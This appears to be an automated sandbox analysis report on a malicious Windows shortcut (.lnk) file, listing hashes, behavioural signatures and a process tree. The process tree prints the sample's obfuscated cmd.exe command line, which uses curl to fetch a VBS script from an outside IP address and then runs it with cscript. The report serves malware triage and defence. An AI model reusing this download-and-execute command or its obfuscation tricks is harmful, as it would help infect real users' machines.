Analysis
-
max time kernel
121s -
max time network
125s -
platform
windows7_x64 -
resource
win7-20230831-en -
resource tags
arch:x64arch:x86image:win7-20230831-enlocale:en-usos:windows7-x64system -
submitted
22/09/2023, 01:20
Static task
static1
Behavioral task
behavioral1
Sample
66e3be9ed2f0e4b2e04753fe1b0a0c6090e984fb0a5128804fa369ed2a4a03b8.lnk
Resource
win7-20230831-en
3 signatures
150 seconds
Behavioral task
behavioral2
Sample
66e3be9ed2f0e4b2e04753fe1b0a0c6090e984fb0a5128804fa369ed2a4a03b8.lnk
Resource
win10v2004-20230915-en
4 signatures
150 seconds
General
-
Target
66e3be9ed2f0e4b2e04753fe1b0a0c6090e984fb0a5128804fa369ed2a4a03b8.lnk
-
Size
2KB
-
MD5
3b9e3ec73aa1ebd4133a1bbc6a26e023
-
SHA1
d3ca550c756f999abbdb149679bdf13bca2bd242
-
SHA256
66e3be9ed2f0e4b2e04753fe1b0a0c6090e984fb0a5128804fa369ed2a4a03b8
-
SHA512
d3b24eff74ba6ce1cedb0f6846f08de4eb815bafa796cf284f9f5c1511c2107e57751beab178fd2cca6e7143b466406fa368acd324ea42f64b9a3694aadabda0
Score
3/10
Malware Config
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Runs ping.exe 1 TTPs 2 IoCs
pid Process 2804 PING.EXE 940 PING.EXE -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 2576 wrote to memory of 2724 2576 cmd.exe 29 PID 2576 wrote to memory of 2724 2576 cmd.exe 29 PID 2576 wrote to memory of 2724 2576 cmd.exe 29 PID 2724 wrote to memory of 940 2724 cmd.exe 30 PID 2724 wrote to memory of 940 2724 cmd.exe 30 PID 2724 wrote to memory of 940 2724 cmd.exe 30 PID 2724 wrote to memory of 2804 2724 cmd.exe 31 PID 2724 wrote to memory of 2804 2724 cmd.exe 31 PID 2724 wrote to memory of 2804 2724 cmd.exe 31 PID 2724 wrote to memory of 2532 2724 cmd.exe 32 PID 2724 wrote to memory of 2532 2724 cmd.exe 32 PID 2724 wrote to memory of 2532 2724 cmd.exe 32
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\66e3be9ed2f0e4b2e04753fe1b0a0c6090e984fb0a5128804fa369ed2a4a03b8.lnk1⤵
- Suspicious use of WriteProcessMemory
PID:2576 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c OJB || ECHo OJB & Pin"g" OJB || CurL http://89.208.106.218/XXR/Bbd -o C:\Users\Admin\AppData\Local\Temp\OJB.vbs & Pin"g" -n 3 OJB || csC"RIP"T C:\Users\Admin\AppData\Local\Temp\OJB.vbs & ExIT2⤵
- Suspicious use of WriteProcessMemory
PID:2724 -
C:\Windows\system32\PING.EXEPin"g" OJB3⤵
- Runs ping.exe
PID:940
-
-
C:\Windows\system32\PING.EXEPin"g" -n 3 OJB3⤵
- Runs ping.exe
PID:2804
-
-
C:\Windows\system32\cscript.execsC"RIP"T C:\Users\Admin\AppData\Local\Temp\OJB.vbs3⤵PID:2532
-
-